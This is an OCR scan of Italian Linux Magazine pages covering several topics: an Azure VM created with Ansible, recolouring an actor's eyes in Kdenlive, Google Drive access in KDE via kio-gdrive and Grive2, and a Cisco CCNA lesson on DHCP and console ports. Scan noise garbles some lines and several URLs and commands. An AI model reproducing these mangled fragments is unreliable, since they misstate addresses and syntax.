nano -/.azure/credentials 


vs Usando il playbook id in guest numero) 

possiamo creare una VM Linux in Azure. Una volta 
spostatolo nel nostro ambiente Ansible eseguiamolo con: 
ansible-playbook azure-vm.yaml e osserviamo l'output a vi- 
deo. Al termine facciamo login via SSH, con utente/chiave, 
al nuovo server usando l'IP pubblico. 
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- Gli occhi multicolore 


Bi Per cambiare il colore degli occhi di un attore si possono usare 


le lenti a contatto, ma con Kdenlive possiamo colorare gli occhi 
con tonalità diverse nella stessa inquadratura in post produzione 


ra le tante cose che si possono voler 
vr rappresentare in un filmato amatoria- 

le o semiprofessionale vi sono degli 
effetti dedicati agli occhi di un attore. Gli oc- 
chi sono infatti una parte molto importante, 
non solo per questioni di tradizione e cultura 
della società in cui viviamo, ma proprio per 
un motivo “biologico”. Come esseri umani 
ci siamo infatti evoluti per prestare molta 
attenzione agli occhi di un’altra persona: 
questo è il motivo per cui in una fotografia 
o un video devono essere sempre perfet- 
ti. Siamo infatti in grado di riconoscere un 
volto anche se è sfocato o in penombra, 
l'importante è che gli occhi siano ben visi- 
bili. A rendere famoso Sergio Leone sono 
stati proprio i primi piani degli occhi di Clint 
Eastwood. Proprio per questa importanza 
molti registi decidono di dedicare proprio 


agli occhi tanta attenzione in diverse situa- 
zioni, eventualmente modificandoli per far 
capire che qualcosa sta cambiando. Vale 
per il mondo horror, dove si può decidere di 
far sanguinare gli occhi di un attore con un 
apposito collirio di sangue finto (che ovvia- 
mente va acquistato solo da venditori affi- 
dabili). E vale per le ambientazioni fantasy, 
dove si può decidere di dare un effetto di 
luminescenza agli occhi, magari cambiando 
loro il colore. Questo secondo effetto è più 
complicato da realizzare in camera: si pos- 
sono utilizzare delle lenti a contatto colora- 
te, ma quelle non cambiano colore durante 
la ripresa. Se si desidera un effetto in cui il 
colore degli occhi dell’attore cambia davan- 
ti alla cinepresa, magari per dimostrare un 
cambiamento nello stato d'animo, bisogna 
ricorrere agli effetti visuali. La computer gra- 


I tagli giusti alla clip 


Dividiamo il filmato in base a quando deve cambiare il colore degli occhi 


UNA SOLA CLIP 
Come in ogni progetto, bisogna iniziare con la clip vi- 
deo, tagliandola dove necessario. Per realizzare que- 
sto effetto è sufficiente un solo filmato, possibilmente contiguo 
{cioè senza tagli nel mezzo]. 


sese 


Linux Magazine 


fore v È «a Normal mode + 
onoenzso 


i mo sorsi 
Ù Pe | 


Properties | Tranatione |. Djects 
> ER 00] cereasst:93 / s0sd:t608 i cio nie 
00-00-0400 


fica è sempre stata utilizzata per cambiare 
i colori di parte dell'immagine senza toc- 
care il resto della scena, e oggi come oggi 
tutti possono farlo grazie ai software come 
Kdenlive. Il punto di partenza è, ovviamen- 
te, una ripresa in cui si vedono chiaramente 
gli occhi dell’attore. Grazie Kdenlive, dopo i 
dovuti tagli, potremo duplicare la clip video 
e posizionare i due cloni uno sopra l’altro, 
perfettamente sincronizzati e sovrapposti. 
Questo ci permetterà di usare la traccia in- 
feriore per tutto ciò che non sono gli occhi, 
dedicando invece la traccia superiore pro- 
prio agli occhi. 

Dovremo quindi ritagliarli da questa clip: la 
soluzione ci viene fornita dall'effetto Chroma 
Key, che rendere trasparente un determinato 
colore. Usando almeno tre o quattro Chroma 
Key in sequenza possiamo “cancellare” tutte 


Fu,0 0A 
TClipisonitor > Project Monitor 
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TANTI SPEZZONI 


Ora possiamo tagliare la clip nei vari punti in cui deve 
avvenire il cambiamento del colore degli occhi. In que- 
sto modo avremo una clip diversa per ogni colore, ma sempre nel- 


la stessa sequenza originale senza interruzioni. 
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LA STESSA CLIP 

Cominciamo duplicando la prima clip in cui va mo- Spostiamo la parte destra della clip nella traccia su- 
dificato il colore degli occhi. Per farlo dobbiamo periore, la Video2. Poi trasciniamo il bordo sinistro di 
tagliarla in due parti, non importa esattamente dove. Avremo questa clip verso sinistra, fino a ottenere la lunghezza della clip 
quindi una parte sinistra e una destra. originale. Facciamo lo stesso col bordo destro della clip in Video1. 


TAGLIO IN DUE 
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LA TRANSIZIONE UNA MASCHERA 

Ora abbiamo due clip identiche una sopra l’altra. Pos- Si deve aggiungere, alla clip della traccia Video2 un ef- 
siamo fonderle assieme usando una transizione Com- fetto Rotoscoping. L'effetto va utilizzato per disegnare 
posite and transform, che deve essere estesa a tutta la durata —un contorno approssimativo degli occhi dell'attore, con una striscia 


della clip. Il compositing normale è Alpha blend. molto sottile sul setto nasale. 


le sfumature di colore della pelle del volto. Per 
semplificare la cosa, il Rotoscoping consente 
di ritagliare a grandi linee gli occhi, sostanzial- 
mente disegnando una maschera, così da 
non doversi preoccupare di tutto il resto del 
viso. A quel punto è possibile colorare ciò che 
è rimasto, praticamente solo iride e pupilla di 
ciascun occhio. Saranno necessari alcuni 
aggiustamenti, perché finché non si esegue 
la colorazione degli occhi non si capisce se 
siano stati ritagliati correttamente dai Chroma 
Key. Ma non è un problema, basta tornare su- 
gli effetti e correggere il necessario. 

Come sempre, potete vedere il video d'esem- 
pio al seguente indirizzo: http:/bit.ly/2PawhWo N Fig.1 Gli occhi hanno un bagliore verde 


0000 
retti 


Linux Magazine 0643 


ALMENO DUE LUCI 


Gli occhi sono qualcosa di un po’ complicato da illuminare. Innanzitutto, se l'attore 
indossa degli occhiali la cosa si fa difficile, perché le lenti deformano la luce. La solu- 


zione potrebbe consistere nel far indossare all'attore degli occhiali finti, nei quali le 
lenti siano di semplice plastica senza un effetto deformante. Le fonti di luce devono 
essere almeno due, oppure una molto forte ma con un buon pannello riflettente. Per 
dare un effetto drammatico, creando una atmosfera di mistero, possiamo illuminare 
con una luce forte ma diffusa dall'alto, non troppo lontana dalla fronte dell'attore. 
Naturalmente, serve una luce nella direzione opposta per eliminare le inevitabili 
ombre che vanno a cadere proprio sugli occhi, proiettate dalla fronte e dal setto na- 
sale. Le due luci possono anche provenire da destra e sinistra, ma conviene sempre 


che una sia spostata un po' verso l'alto e l'altra verso il basso. I Fig. 2 * Gli occhi hanno assunto un colore blu 


Coloriamo l’immagine 


Possiamo finalmente colorare l'occhio con la tonalità che vogliamo 
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UN CHROMA KEY 
0 Dobbiamo mantenere soltanto iride e pupilla degli 
occhi, quindi inseriamo un effetto Chroma key per 
far sparire la pelle del volto. Basta selezionare il colore della 
pelle e impostare per adesso una varianza minima. 
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LA COLORAZIONE 
03 Aggiungiamo un effetto di tipo Colorize, sele- 
zionando il colore che vogliamo dare agli occhi 


{hue), e anche saturazione e luminosità. Lo spettro va dal 
rosso al giallo, verde, blu, e viola. 
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SECONDO E TERZO 
0 Similmente, bisogna aggiungere altri effetti Chroma 
key selezionando il colore delle ciglia e altre even- 
tuali sfumature. Per adesso teniamo la varianza di ogni effetto al 
minimo, così da non renderli realmente funzionanti. 
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POCHE CORREZIONI 
04 Ora possiamo tornare sugli effetti Chroma key creati 
in precedenza e modificare la varianza. L'obiettivo è 
che ad apparire colorata sia solo la parte interna dell'occhio, e 
non il resto. Si possono anche modificare i colori dei chroma key. 


Da un colore all’altro 


Modifichiamo il colore dell'occhio nelle clip successive 


n Alpha operations 
Dispiay 
Dispisy input alpha 


SUL LIVELLO ALFA 

Alla fine, trovato il corretto colore degli occhi e le giu- 

ste chiavi cromatiche per nascondere il superfluo, 
possiamo sfumare l'alone colorato con l’effetto Alpha operations 
usando l'operazione Blur. 
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TANTI SPEZZONI 

10) 3 Ora bisogna tagliare questa clip in modo che gli spez- 

zoni della traccia Video2 combacino con quelli della Vi- 

deo1. Anche la transizione va estesa a tutte le clip: la sua modalità 
può rimanere Alpha blend, oppure essere cambiata in Screen. 
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CONTORNO GIUSTO 

0 sì L'altro effetto che conviene modificare tra i vari spez- 

zoni è il Rotoscoping. L'attore potrebbe infatti essersi 

spostato, quindi bisogna eventualmente seguire il movimento de- 
gli occhi con il contorno del rotoscope. 
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CLIP PIÙ LUNGA 
La clip con tutti gli effetti può poi essere per raggiun- 
gere la lunghezza totale delle varie clip in cui gli occhi 


devono cambiare colore. È sufficiente tirare la maniglietta del bor- 
do destro della clip. 


Lu 
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Colorize in ciascuno spezzone, permettendo quindi agli 


occhi dell'attore di cambiare colore da una clip all'altra. Cambiando 
la tonalità conviene aggiustare anche luminosità e saturazione. 


02/12/19 % 


EFFETTO SONORO 

0 6 Per dare un maggiore risalto all'effetto, possiamo ag- 
giungere un suono nel momento esatto in cui si passa 
da una clip all'altra, e quindi da un colore all’altro. Per scaricare un 
suono basta usare il menù Project/Internet resources. 
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Licenza: GNU GPL 

Sito Web: https:/phabricator.kde.org/ 
project/profile/72/ 
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SINCRONIZZARSI 
CON GOOGLE 


Accedere ai propri dati su Google Drive come 
se fossero davvero sul disco richiede solo 
un paio di clic, grazie al backend Gdrive di KDE 


niziare un progetto sul PC Desktop, conti- 
nuarlo sul portatile — ad esempio in viaggio 

sul treno — e verificarlo prima della conse- 
gna/discussione su un dispositivo portatile come 
tablet o simili, oggi sembra essere la prassi con- 
solidata per diversi professionisti e non profes- 
sionisti. Per tale dinamica una volta ci si doveva 
affidare esclusivamente a sistemi di storage 
portatili: nell’era “preistorica” dell’informatica 
erano i floppy disk poi, ancora oggi in sparuti 
casi CD/DVD, e nella maggioranza dei casi 
le più piccole portatili e affidabili stick USB. 
Ma la tendenza, anche se lentamente, sembra 
cambiare verso l’utilizzo di sistemi di condi- 
visione online, le cosiddetta “nuvola” (cloud 
computing) che nella sua accezione generica 
indica un sistema distribuito in grado di offrire 
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@ Fig. 1 è Un esempio di come funziona KIO su un CD audio 
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servizi di calcolo, basi di dati così come risorse 
di archiviazione. Ciò ha dato vita nel tempo a 
nuovi paradigmi identificabili con le sigle IaaS, 
PaaS e SaaS. Acronimo di Infrastructure as a 
Service, IaaS è un modello nel quale l'azienda 
esternalizza la propria infrastruttura IT: non 
acquista server fisici ma li affitta presso terzi 
senza preoccuparsi di dove essi siano collocati 
geograficamente. Nel modello PaaS (Platform 
as a Service) il fornitore si occupa del corretto 
funzionamento dell’infrastruttura (server fisici 
con sistema operativo, rete e storage) mentre 
l’utente sviluppa le proprie applicazioni azien- 
dali, il proprio sito, i servizi che dovrà offrire 
ecc. Infine il paradigma Saas (Software as a 
Service) è probabilmente il più utilizzato poiché 
è un servizio sviluppato dal fornitore e messo 
a disposizione degli utenti gratuitamente (e.g. 
Office 365) o previo abbonamento mensile. 
I 3 livelli di astrazione definiti rientrano nel- 
la galassia del cloud computing e, a seconda 
dell’applicazione, è evidente come presentino 
innegabili vantaggi in termini di scalabilità, 
costi e affidabilità. Nelle pagine che seguono 
daremo spazio all’astrazione SaaS con prin- 
cipale riferimento a Google Drive, ma non è 
l’unica possibilità e molti utenti potrebbero 
avere maggiore giovamento nell’utilizzare 
altri competitor che riportiamo nel Box “Le 
alternative”. 


CENNI SUL 
FRAMEWORK KDE 


Correva l’anno 1996 quando fu annunciato da 
Matthias Ettrich — studente all’ Università 
di Tubinga (htips://uni-tuebingen.de/) — il 


progetto KDE (K Desktop Environment), un 
ambiente desktop che nel tempo si è arricchito 
di un elevato numero di applicazioni: file mana- 
ger, browser, player multimediale fino ad una 
completa suite per l’ufficio di nome KOffice 
(dal 2010 ha cambiato nome in Calligra — 
https://www.calligra.org/). 


Ma cosa ha a che vedere questo richiamo sto-- 


rico con Google Drive? Con il rilascio della 
versione 2.0 di KDE — nel lontano Ottobre 
2000! - vengono introdotte significative mi- 
gliorie tecnologiche ancora oggi presenti. Tra 
queste dobbiamo obbligatoriamente menzionare 
l’infrastruttura KIO (KDE Input Output, 
https://cgit.kde.org/kio.git) di fatto una libreria 
di livello 3 con la quale si fornisce accesso a 
filesystem locali e remoti (e.g. file e cartelle), 
siti Web e altre risorse mettendo a disposizione 
specifiche API (Application Programming 
Interface). Ricordiamo che nel gergo KDE 
una libreria di livello 3 è intesa come un sof- 
tware che per funzionare correttamente può 
dipendere da applicazioni di livello 2 e 1, dalle 
librerie Qt e/o da specifiche librerie di sistema. 
La libreria KIO supporta un certo numero e 
tipo di protocolli ed è possibile estenderne le 
funzionalità implementandone/installandone 
ulteriori pacchetti e tra breve lo vedremo con 
un esempio. Questa caratteristica le permette di 
richiamare e gestire tramite apposito applicativo 
il servizio corrispondente ad alto livello (lato 
utente) e per farlo necessita di avere “all’altro 
capo” un software KIOSlave (KIO-aware o 
ioslave) che risponda al requisito richiesto. Un 
KIOSlave è un programma o libreria che una 
volta attivato fornisce un supporto ad uno speci- 
fico protocollo come, ad esempio, HTTP, FTP, 
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SMB, SSH, SFTP, SVN ecc. Quanto accennato 
spiega il motivo in base al quale programmi 
come il browser Konqueror e il file mana- 
ger Dolphin (ovvero programmi KIO-aware) 
sono in grado di lavorare in maniera coerente 
con alcuni protocolli. Ad esempio è grazie a 
KIO che Konqueror è in grado di effettuare 
l’upload di file via FTP e/o WebDav rendendo 
la procedura semplice e intuitiva. Con questo 
tipo di paradigma il web è una risorsa come 
un’altra per ricevere e/o inviare dati come se 


«LE ALTERNATIVE 
Non c’è solo Google Drive! 


Iniziamo dallo storico Dropbox che 
supporta ufficialmente GNU/Linux 
con un proprio client (Attps:/Avww. 
dropbox.com/install?os=Inx) così come 

il cloud storage Mega (fittps:/mega. 
nz/) mette a disposizione un’app 
dekstop per il Pinguino (ftips://mega. 
_nz/sync) e medesimo discorso vale per 
SpiderOak (https://spideroak.com/one/ 
download/). Tra inomi meno blasonati 
ricordiamo il Russo Yandex (ht{ps:// 
yandex.com/) con il suo client da linea di 
comando (https://repo,yandex.ru/yandex- 


disk) e lo Svizzero pCloud (Anttps:/www. 
peloud.com) anch'esso con client GNU/ 


Linux dedicato. Ognuno dei competitor 


riportati ha le proprie caratteristiche 
orientate alla sicurezza, alla fornitura 
di servizi di backup online, alla 
sincronizzazione automatica con cartella 
nel filesystem locale del computer, file 
hosting e dimensione massima dei file, 
condivisione di file via Web ecc. Sarà poi 
iltarget dell'utente ad orientarlo verso 
l'una o l'altra nelle versioni Free o a 
pagamento con canone mensile. 


si stesse operando a livello locale. Facciamo 
un esempio pratico: installiamo audiocd-kio 
(https://github.com/KDE/audiocd-kio) con il 
gestore dei pacchetti della distribuzione. Ora 
proviamo a inserire un CD audio e apriamo 
Konqueror o Dolphin. Nella barra degli indirizzi 
digitiamo audiocd:/ per vedere da li a poco 
tutte le tracce audio ed alcune cartelle che non 
fanno parte del CD ma che vengono inserite dal 
KIOSlave audiocd-kio per comodità (Figura 
1). Infatti, trascinando, ad esempio, una traccia 
nella cartella Ogg Vorbis o MP3 inizierà subito 
la sua conversione nel formato dove è stata 
trascinata. Per la descrizione della dinamica vi 
rimandiamo al programma KHelpCenter inse- 
rendo nel rigo di ricerca kioslave e scegliendo 
dal pannello di destra il risultato di interesse. 
Altri KIOSlave di immediato utilizzo vedono 
fonts:/ che mostra i font installati, sftp:/ per 
trasferimenti FTP via SSH ecc. 


GOOGLE DRIVE 
IN GNU/LINUX 


Google Drive è uno dei tanti servizi offerti 
dalla galassia Google. Ha visto la luce il 24 
Aprile del 2012 come sistema di storage remoto 
che permette di conservare foto, documenti, 
progetti, registrazioni audio/video e molto al 
fine di averli sempre a disposizione ovunque 
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La configurazione dell’account 


Integriamo Google Drive nell’ambiente KDE 


Scuse, 3 S3o 2 È Cueicisvanta carta: 


ACCOUNT 

Da Dolphin click sulla cartella 

Google Drive: verrà aperta la 
pop-up Account in linea - Modulo delle 
impostazioni di sistema nella quale do- 
vremo cliccare su + Crea per vedere i 3 
pulsanti nel pannello di destra. Quello di 
nostro interesse è Google, e cliccando su 
di esso verrà aperta una seconda pop-up 
Web authentication for Google. 


06 
KDE KAccounts Provider would like to: | 
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AUTORIZZAZIONI 

Inseriamo —e-mail/telefono 

dell'account Google quindi 
click su Avanti per inserire la password e 
click su Accedi. Procediamo con l'eventua- 
le scelta di come utilizzare quel login qua- 
lora avessimo più servizi legati all'account 
google (e.g. YouTube) quindi alla richiesta 
di accesso KDE Kaccounts Provider would 
like to (in figura) opteremo per Allow. 
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GOOGLE DRIVE SU KDE! 


A questo punto il processo di 

autenticazione è completo per 
l'accesso a Google Drive. La dinamica da 
seguire non cambia utilizzando Konqueror 
in quanto essendo un programma KIO- 
aware gli viene offerta da KIO una API co- 
erente: è sufficiente digitare gdrive:/ nella 
barra degli indirizzi per avere lo stesso ri- 
sultato visibile in figura per Dolphin. 


ci si trovi e ovunque ci sia una connessione. Chi 
ha un account Google attivo ha a disposizione 
gratuitamente 15 GB di spazio di archiviazione 
che diventano 30GB per chi utilizza Google Apps 
in ambito educativo/scolastico e/o professionale. 
È possibile aumentare lo spazio a disposizione ri- 
correndo a piani aggiuntivi a pagamento. Una delle 
peculiarità di Google Drive è anche la possibilità 
di visualizzare formati di specifici programmi (e.g 
AI di Adobe Illustrator, PSD di Adobe Photo- 
shop e DXF di Autodesk AutoCad) direttamente 
nel browser senza la necessità di avere installato 
il programma corrispondente (alcuni dei quali 
non supportano nemmeno GNU/Linux!). Non 
mancano inoltre strumenti per la modifica dei 
documenti e collaborazione multi utente in tempo 
reale. Tra queste note positive non poteva mancare 
quella stonata! Da tempo immemore Google ha 
promesso un client per GNU/Linux ma ad oggi, 
fine 2019 dopo oltre 7 anni dal lancio del servizio, 
non se ne vede nemmeno l’ombra. 

Ma fortunatamente il mondo open source ha diverse 
frecce al proprio arco per sopperire alla mancanza 
di un client ufficiale, e una delle soluzioni utilizza 
il framework KIO al fine di avere l’accesso in ma- 
niera semplice e intuitiva al servizio Google Drive. 
È sufficiente installare con il gestore dei pacchetti 
della distribuzione in uso il pacchetto kio-gdrive 
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accettando, ovviamente, anche l’installazione di 
eventuali dipendenze. Il software kio-gdrive è 
un KIOSlave che consente alle applicazioni che 
gestiscono KIO (e.g. Dolphin, Gwenview, l'editor 
Kate e Konqueror) di accedere e modificare i file 
presenti in Google Drive. Al termine dell’installa- 
zione aprendo il file manager Dolphin e cliccando 
sulla cartella Rete dovremo vedere la cartella Go- 
ogle Drive (Figura 2): tutto questo senza necessità 
alcuna di avere le credenziali dell’amministratore, 
senza usare la riga di comando o metter mano a 
qualche criptico file di configurazione! A questo 
punto possiamo procedere con il primo tutorial, ma 
prima assicuriamoci di aver installato il pacchetto 
kaccounts-providers altrimenti non ci verrà mostrato 
nulla durante la fase di integrazione. Facciamo pre- 
sente che andando in Impostazioni di sistema nella 
sezione Personalizzazione alla voce Account in 
linea possiamo sempre rimuovere quanto aggiunto 
con la procedura riportata nel tutorial. 


SINCRONIZZO 
DOVE DICO 10! 


La procedura riportata nelle pagine precedenti 
permette di accedere a Google Drive e qualunque 
modifica riportata nella cartella di accesso del file 
manager si rifletterà nello spazio Google Drive 


e viceversa: qualsiasi cosa venga modificata, ag- 
giunta o rimossa via browser dal proprio spazio 
cloud la vedremo in locale dal file manager. La 
sincronizzazione è di fondamentale importanza, 
sarebbe infatti inutile modificare file, cancellare 
quelli che non ci servono o aggiungerne di nuovi 
se poi non abbiamo la possibilità di sincronizzare 
il contenuto tra la cartella locale e quella remota. 
In alcuni casi si preferisce sincronizzare i conte- 
nuti con una cartella specifica nella home utente 
(o più in generale nel filesystem) con modalità 
non legata a client KIO-aware. Per tale obiettivo 
possiamo affidarci alla soluzione open source 
Grive2 (https://github.com/vitalif/grive2, fork 
di Grive oggi non più sviluppato). Sebbene sia 
ancora in fase di sviluppo offre tutte le funzioni 
necessarie agli utenti più comuni. Per soluzioni 
complete, possiamo fare riferimento a software 
proprietari riportati nel Box “Altre soluzioni”. 
Per installare Grive2 sul nostro PC possiamo 
recuperare manualmente le versioni RPM dal 
sito pkgs.org (https://pkgs.org/download/gri- 
ve2), o direttamente con il gestore dei pacchetti. 
Su Fedora basta il comando 


dnf install grive2 


Le distribuzioni di tipo Debian non hanno il pac- 


File Modifica Visualizza Segnalibri 


GoogleDrivel$ grive -a 


fUAGL-15aA0CDv78B 


l di 


nnoneEletto 


impostazioni 


this URL and get an authentica 


Aiuto 


Fig. 3 * Contenuto di Google Drive sincronizzato in locale 


chetto di grive2 nei repository, ma per Ubuntu 
esiste un repository non ufficiale che possiamo 
aggiungere al sistema con i comandi 


sudo add-apt-repository 
ppa:nilarimogard/webupd8 


sudo apt-get update 


Questo repository contiene pacchetti per tutte le 
ultime versioni Ubuntu, e i pacchetti sono com- 
patibili con le versioni delle librerie disponibili 
anche in Debian. Il pacchetto può poi essere 
installato col classico comando 


Da notare che il nome è solo grive invece di gri- 
Ve2: si è deciso di omettere il numero per mante- 
nere la retrocompatibilità con i comandi usati per 
Grive, il software di cui Grive2 è un fork. Dopo 
avere installato Grive scegliamo una cartella dove 
sincronizzare il contenuto di Google Drive, ad 
esempio /hnome/nome_utente/mioGoogleDrive. 


Apriamo un terminale e entriamo in essa con ed 
Ihome/nome_utente/mioGoogleDrive quindi 
usiamo l’opzione -a solo per il primo lancio grive 
-a. Come visibile in Figura 3 ci verrà fornito un 
link nel quale dovremo dire a Google Drive di 
permettere l’accesso a Grive2 per vedere, editare, 
creare e cancellare i file nel cloud cliccando sul 
pulsante Allow (procedura uguale al cient kio- 
gdrive, secondo passo del tutorial). Concesso il 
permesso partirà la sincronizzazione tra cartella 
locale e remota, nello specifico essendo quella 
locale vuota verrà scaricato tutto il contenuto di 
Google Drive associato al nostro account. A par- 
tire da questo punto qualsiasi modifica in locale 
e/o in remoto la sincronizzazione non avverrà 
finché non lanciamo — senza opzioni — di nuovo 
il comando grive dalla cartella locale mioGoo- 
gleDrive. Per tutte le funzioni supportate digitare 
grive --help. Tra le più interessanti segnaliamo 
--dry-run che riporta in output solo i cambi ma 
senza attuarli. L’esecuzione automatica di grive2 
si può ottenere con Cron, il pianificatore di ope- 
razioni di Linux, usando una qualsiasi interfaccia 


grafica per programmare il lancio del comando 
ogni 30 minuti. 


NON PIÙ ABANDONWARE! 


Abbiamo visto come KIOSlave sia una funzione 
comune all'interno del framework KIO, che con- 
sente alle applicazioni KIO-aware di interagire 
coni servizi al di fuori del filesystem locale come 
se fossero in locale e un esempio lo abbiamo visto 
con gdrive:/. Esistono, però, anche applicazio- 
ni KIO-unaware ovvero tutti quei programmi 
"inconsapevoli" di KIO e pertanto non in grado 
di interagire con esso, ad esempio LibreOffice. 
Una possibile soluzione a questo inconveniente 
probabilmente potrà venire dall'utilizzo di FUSE 
(Filesystem in USErspace, https://github.com/ 
libfuse/libfuse) un modulo del kernel e una libreria 
che permettono ai processi in spazio utente di 
fornire un filesystem che può essere montato e 
acceduto da normali applicazioni. In questo sce- 
nario il progetto KIO-fuse (https://invent.kde. 
org/kde/kio-fuse) ha ripreso il suo sviluppo dopo 
ben 14 anni di abbandono (https://techbase.kde. 
org/Projects/KioFuse) e probabilmente quando 
questo numero di Linux Magazine sarà in edicola 
il software sarà già disponibile. L'obiettivo di KIO- 
fuse sarà quello di permettere di montare tutti i 
protocolli supportati da KIO come se fossero dei 
dischi reali e permettere l’acceso al framework 
KIO anche ai programmi che non lo supportano 
nativamente. Ad esempio nell'ambiente Gnome 
un lavoro del genere è svolto da GVfs (GNOME 
Virtual file system, https://wiki.gnome.org/ 
Projects/gvfs). 
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bbiamo parlato del protocollo IP, 
del subnetting, dei domini di col- 
lisione. E abbiamo spiegato come 


funziona la gestione del livello Datalink tra- 
mite protocolli come ARP. Sappiamo che gli 
indirizzi MAC sono assegnati univocamente 
a ciascuna scheda di rete a livello hardware 
o software. Il livello di Rete ha ovviamente 


bisogno di un suo metodo per l’assegnazio- 
ne degli indirizzi IP. Questo metodo, oltre 
all’indicazione completamente manuale, 
consiste nell’uso del protocollo DHCP. Si 
tratta di un meccanismo automatico per col- 
legare il livello datalink e il livello di rete, 
e capire il suo funzionamento è importante 
perché per comodità si ragiona sempre in 
base agli indirizzi IP (per esempio, per ac- 
cedere a un dispositivo tramite ssh o telnet) 
quindi bisogna saper trovare l’IP giusto. Il 
protocollo Dynamic Host Configuration 
Protocol, DHCP, permette la configurazione 
automatica della rete, ma è anche possibile 
configurare le proprie macchine in modo 
statico, impostando manualmente i valori re- 
lativi alla rete (IP del gateway, maschera di 
sottorete, IP statico). Tuttavia, in molti casi 
una configurazione automatica è più che suf- 
ficiente, e non c’è alcun bisogno di perdere 
tempo a configurare manualmente centinaia 
di sistemi quando esiste un protocollo che fa 
(quasi) tutto da solo. 


ASSEGNARE GLI IP 


Il protocollo DHCP si basa su 6 tipi di 
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CISCO CON A 4° parte 


200-125: 
IL CORSO COMPLETO 


Continua il corso per prepararsi all'esame Cisco 
CCNA: cominciamo a scoprire la sintassi e il 
funzionamento dei comandi del sistema operativo 
I10S, di cui sono dotati tutti i dispositivi di Cisco 


messaggi, che vengono scambiati tra il 
client (il computer) e il server (un router o 
un layer3 switch, che è un router dotato di 
molte porte). Sostanzialmente, il client che si 
vole connettere a una rete invia un pacchetto 
DHCPDISCOVER per chiedere se 
all’interno della rete esista un server DHCP 
pronto a rispondere. Tradizionalmente, ma 
non è obbligatorio, l’indirizzo di sorgente 
del pacchetto è 0.0.0.0 (perché il computer 
non ha ancora un IP valido) e l’indirizzo 
del destinatario è un indirizzo di broadcast 
(255.255.255.255). A quel punto il server 
(o i server, se ce n’è più d’uno) risponde 
con un pacchetto DHCPOFFER, che è 
indirizzato verso il MAC del computer che 
aveva lanciato il ‘discover’, e contiene 
sia il proprio indirizzo IP che l’indirizzo 
IP proposto al client. Il client attende 
qualche secondo per assicurarsi di avere 
ricevuto tutte le offerte possibili dai vari 
server DHCP, e alla fine ne sceglie una 
inviando una richiesta col pacchetto 
DHCPREQUEST (a volte chiamato 
DHCPACCEPT). Questo pacchetto contiene 
l’informazione server identifier, che indica 
il server DHCP selezionato. Alla fine, solo 
il server selezionato risponde per l’ultima 
volta, con un pacchetto di tipo DHCPACK 
(Acknowledgement, riconoscimento), che 
è indirizzato sempre al MAC del computer 
richiedente, ma viene letto da tutti gli altri 
server DHCP, i quali rimettono nella pool i 
loro indirizzi IP che avevano riservato per 
questo client. Solo a questo punto, infatti, il 


nuovo computer può usare il nuovo indirizzo 
IP. E può farlo per un periodo di tempo 
limitato, il cosiddetto lease time, cioè tempo 
di noleggio. Di fatto, gli indirizzi IP sono 
gestiti dai server in una DHCP pool, cioè un 
elenco di indirizzi “liberi”, e li noleggiano 
ai client man mano. Esistono poi i pacchetti 
DHCPINFORMATION e DHCPRELEASE, 
che servono rispettivamente per ottenere 
maggiori informazioni dal server durante il 
negoziato prima di accettare una offerta e per 
liberare un IP dall’attuale assegnazione. Il 
rilascio di un indirizzo IP non è obbligatorio: 


client 


server 


Mi Fig. 1 Lo scambio di messaggi per 
assegnare un indirizzo IP con DHCP 


si può spegnere un computer senza per forza 
liberare il suo indirizzo IP, anzi: spesso non 
lò si fa in modo da mantenere lo stesso IP al 
prossimo riavvio. 


IN E OUT OF BAND 


Ora sappiamo come i computer vengono 
configurati per connettersi ai dispositivi di 
rete come router e switch. E probabilmente 
tutti lo sapevano già a grandi linee 
dalla propria esperienza configurando 
la rete domestica. La domanda è: come 
configuriamo i dispositivi di rete? 
Naturalmente, tutti i dispositivi di rete 
(quelli professionali, il router di 
casa) si possono configurare con i classici 
meccanismi di accesso remoto come SSH 
o telnet. Questi sono i metodi di controllo 
del dispositivo In Band, perché funzionano 
quando il dispositivo è connesso alla rete. 
Se però la configurazione è stata eseguita 
nel modo sbagliato, o ci sono altri problemi 
alla rete, è probabile che non sia possibile 
connettere il dispositivo. Per questo esistono 
i metodi Out of Band, da utilizzare come 
alternativa quando non si può fare l’accesso 
remoto. 
Se osserviamo un router, noteremo che sul 
retro dispone di una porta Console e una 
AUX: queste si presentano con un connettore 
RJ45, e possono essere usate con un apposito 
cavo adattatore (di solito RS-232 o USB) per 
collegarsi al router col proprio PC persino 
nel caso il router avesse problemi di boot. 
La porta Console è utilizzata per collegarsi 
direttamente al proprio computer con un 
connettore tramite porta DB-9 o USB, 
mentre la Ausiliaria (AUX) è utilizzata 
per collegarsi a un modem (di solito con la 
porta DB-25), tramite il quale stabilire una 
connessione ausiliaria per il controllo remoto 
del dispositivo. 

Praticamente, con la porta AUX ci si può 

connettere al router passando tramite un 

modem (che deve essere funzionante), e 

quindi agire da remoto per riconfigurare il 

router passando attraverso la classica linea 

telefonica pubblica. In realtà, esistono tre 
distinti “piani” per una rete: 

e Data Plane: qui “scorrono” i dati degli 
utenti, quindi tutto il traffico dei vari 
protocolli HTTP, FTP, SSH, eccetera 

e Control Plane: a questo piano 
appartengono le informazioni che servono 
a controllare il flusso dei dati degli utenti, 
per esempio i protocolli NTP e i protocolli 


non 


Rol-Oyer 
cable dad 


SB Fig.2-La 
connessione alla 
console avviene 
tramite un cavo 
ethernet-DB9 
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adapter 


di routing come OSPF o protocolli di 
ridondanza come l’ HSRP 

e Management Plane: in questo piano 
passano le informazioni per la gestione dei 
dispositivi di rete, quindi i vari protocolli 
per configurare router, switch, eccetera 


Nei router casalinghi questi tre piani sono 
gestiti tramite una unica rete: la connessione 
che usiamo per spostare i dati verso il router 
è anche la stessa utilizzata per controllarlo 
e configurarlo. Tuttavia, nelle reti più sicure 
si preferisce evitare di avere tutto sulla 
stessa rete, perché la rete aperta al pubblico 
è inevitabilmente insicura. Confinando 
il controllo del router alle interfacce 
accessibili solo dai tecnici, diventa tutto più 
sicuro. Quindi, l’utilizzo delle porte Console 
o AUX dovrebbe essere sempre preferito, 
se possibile, al controllo remoto tramite 
SSH. Una soluzione intermedia consiste 
nell’utilizzare sempre la stessa rete per i tre 
piani, ma limitare l’ultimo in una VPN il cui 
accesso è permesso solo ai tecnici. 

I dispositivi più recenti hanno anche una 
porta USB, di solito un USB di piccole 
dimensioni come il tipo USB mini o USB 
C, che è collegata alla porta Console (sono 
entrambe segnalate col colore blu). Quindi 
in questi casi non serve alcun adattatore, ci 
si può connettere al router con un monitor 
seriale direttamente usando il cavo USB. 
Da non confondere con la porta USB di tipo 
A, che viene invece usata per trasferire le 
immagini del sistema operativo da scrivere 
